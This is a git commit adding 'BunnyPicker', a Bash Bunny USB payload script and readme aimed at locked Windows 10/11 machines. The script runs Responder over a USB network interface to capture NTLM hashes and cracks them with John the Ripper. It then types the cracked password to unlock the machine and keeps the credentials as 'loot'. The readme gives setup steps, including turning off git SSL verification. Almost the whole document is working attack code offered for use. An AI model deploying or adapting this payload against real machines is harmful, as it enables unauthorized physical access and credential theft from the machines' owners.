Merge pull request #585 from rf-bandit/BunnyPicker

Added BunnyPicker
2025-10-29 16:58:25 +00:00 · 2023-06-06 13:48:11 -05:00
parent bb1f296d81 b4ba117e41
commit 4da1333ab9
2 changed files with 228 additions and 0 deletions
--- a/payloads/library/credentials/BunnyPicker/payload.txt
+++ b/payloads/library/credentials/BunnyPicker/payload.txt
@@ -0,0 +1,111 @@
 #!/bin/bash
 #
 #Author: rf_bandit
 #Version: Version 1.0
 #Credit: Hak5Darren, Mubix, catatonic, mame82
 #Firmware: 1.7
 #Date: May 2023
 #
 # Options
 RESPONDER_OPTIONS="-w -r -d -P"
 LOOTDIR=/root/udisk/loot/bunnypicker
 WORDFILE= <PATH TO DICTIONARY HERE>
 #eg /tools/john/password.lst
 # or install via tools folding in arming mode (/tools/<wordlist>)
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
 # Check for responder and john
 REQUIRETOOL responder
 REQUIRETOOL john
 # Setup Attack
 LED SETUP
 # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
 ATTACKMODE HID RNDIS_ETHERNET 
 #ATTACKMODE ECM_ETHERNET
 # Set convenience variables
 GET TARGET_HOSTNAME
 GET TARGET_IP
 # Setup named logs in loot directory
 mkdir -p $LOOTDIR
 HOST=${TARGET_HOSTNAME}
 # If hostname is blank set it to "noname"
 [[ -z "$HOST" ]] && HOST="noname"
 COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
 COUNT=$((COUNT+1))
 mkdir -p $LOOTDIR/$HOST-$COUNT
 # As a backup also copy logs to a loot directory in /root/loot/
 mkdir -p /root/loot/bunnypicker/$HOST-$COUNT
 # Check target IP address. If unset, blink RED and end.
 if [ -z "${TARGET_IP}" ]; then
    LED FAIL2
 	exit 1
 fi
 # Set LED yellow, run attack
 LED ATTACK
 cd /tools/responder
 # Clean logs directory
 rm logs/*
 # Run Responder with specified options
 python Responder.py -I usb0 $RESPONDER_OPTIONS &
 # Wait until NTLM log is found
 until [ -f logs/*NTLM* ]
 do
     # Ima just loop here until NTLM logs are found
 	 sleep 1
 done
 # copy logs to loot directory
 cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
 cp logs/* $LOOTDIR/$HOST-$COUNT
 # Sync USB disk filesystem
 sync
 #kill responder
 killall python
 killall python
 killall python
 #Cracking begins!
 cd /tools/john
 LED STAGE1
 #This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
 #We could go CUCMBER PLAID here but its probably not needed
 ./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt 
 # Check john.pot If empty blink RED and end. Move to offline attack.
 if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
   LED FAIL3
   exit 1
 fi
 #This will copy our cracked password to the loot folder for future use.
 LED STAGE2
 awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
 echo -n "STRING " > $PAYLOAD_DIR/pass.txt
 cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
 #This should unlock the machine with our cracked password.
 #$PAYLOAD_DIR would not work with QUACK
 QUACK ESC
 DELAY 100
 QUACK $SWITCH_POSITION/pass.txt
 QUACK ENTER
 rm $PAYLOAD_DIR/pass.txt
 LED CLEANUP
 sync
 # When the light turns green its a hacked machine.
 LED FINISH
--- a/payloads/library/credentials/BunnyPicker/readme.md
+++ b/payloads/library/credentials/BunnyPicker/readme.md
@@ -0,0 +1,117 @@
 # Bunnypicker (Win10 Lockpicker for Bash Bunny)
 .______    __    __  .__   __. .__   __. ____    ____ .______    __    ______  __  ___  _______ .______      
 |   _  \  |  |  |  | |  \ |  | |  \ |  | \   \  /   / |   _  \  |  |  /      ||  |/  / |   ____||   _  \     
 |  |_)  | |  |  |  | |   \|  | |   \|  |  \   \/   /  |  |_)  | |  | |  ,----'|  '  /  |  |__   |  |_)  |    
 |   _  <  |  |  |  | |  . `  | |  . `  |   \_    _/   |   ___/  |  | |  |     |    <   |   __|  |      /     
 |  |_)  | |  `--'  | |  |\   | |  |\   |     |  |     |  |      |  | |  `----.|  .  \  |  |____ |  |\  \----.
 |______/   \______/  |__| \__| |__| \__|     |__|     | _|      |__|  \______||__|\__\ |_______|| _| `._____|
         ,
        /|      __
       / |   ,-~ /
      Y :|  //  /
      | jj /( .^
      >-"~"-v"
     /       Y
    jo  o    |
   ( ~T~     j
    >._-' _./
   /   "~"  |
  Y     _,  |
 /| ;-"~ _  l
 / l/ ,-"~    \
 \//\/      .- \
 Y        /    Y    -Row
 l       I     !
 ]\      _\    /"\
 (" ~----( ~   Y.  )
 ~~~~~~~~~~~~~~~~~~~~~~~~~~
 Author: rf_bandit
 Version: Version 1.0
 Credit: Hak5Darren, Mubix, catatonic, mame82
 Firmware: 1.7
 Target: Windows 10/11
 Date: May 2023
 ## Description
 This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
 Snags credentials from locked machines 
 Implements a responder attack. Saves creds to the loot folder on the USB Disk
 Looks for *NTLM* log files
 Cracks hash with John the Ripper. Best with a smaller dictionary.
 Saves cracked hash to loot folder
 Quacks password and unlocks machine
 On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
 If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
 We can run through 100K simple passwords in 1 second.
 Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
 ## Configuration
 .
 Configured for Windows. Not tested on Mac/*nix
 The path to the wordfile needs to be configured, eg /tools/<your-file-here> or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
 ## Requirements
 Responder must be in /tools/responder/
 (Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
 JtR must be in /tools/john
 Requires initial setup (below)
 ## Initial Setup
 Install responder from https://forums.hak5.org/topic/40971-info-tools/
 Replace /etc/apt/sources.list with:
 deb http://archive.debian.org/debian/ jessie main non-free contrib
 deb-src http://archive.debian.org/debian/ jessie main non-free contrib
 deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
 deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
 apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
 The john package included can't handle NTLM hashes so we will make our own. 
 Install gcc and git if you don't have them.
 apt-get install gcc
 apt-get install git
 git config --global http.sslverify "false" (this is insecure but I'm not worried)
 git clone https://github.com/openwall/john
 cd john
 ./configure && make
 mv run /tools/john
 cd ..
 rm -r john (not required but a space saving measure)
 ## STATUS
 | Status              | Description                              |
 | ------------------- | ---------------------------------------- |
 | LED SETUP           | Starting                                 |
 | LED ATTACK          | Grabbing creds                           |
 | LED STAGE1          | Running JtR                              |
 | LED STAGE2          | Unlocking                                |
 | LED CLEANUP         | Sync to disk                             |                               
 | LED FINISH          | Trap is clean                            |   
 | FAIL1               | Responder not found at /tools/responder  |
 | FAIL2               | Target did not aquire IP address         |
 | FAIL3               | Hash not cracked - move to offline attack|
 ## ADDITIONAL NOTES
 For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
 A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
 Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
 and unlocked machines.
 This was fun to make. Thanks to everyone who put in all the hard work before me.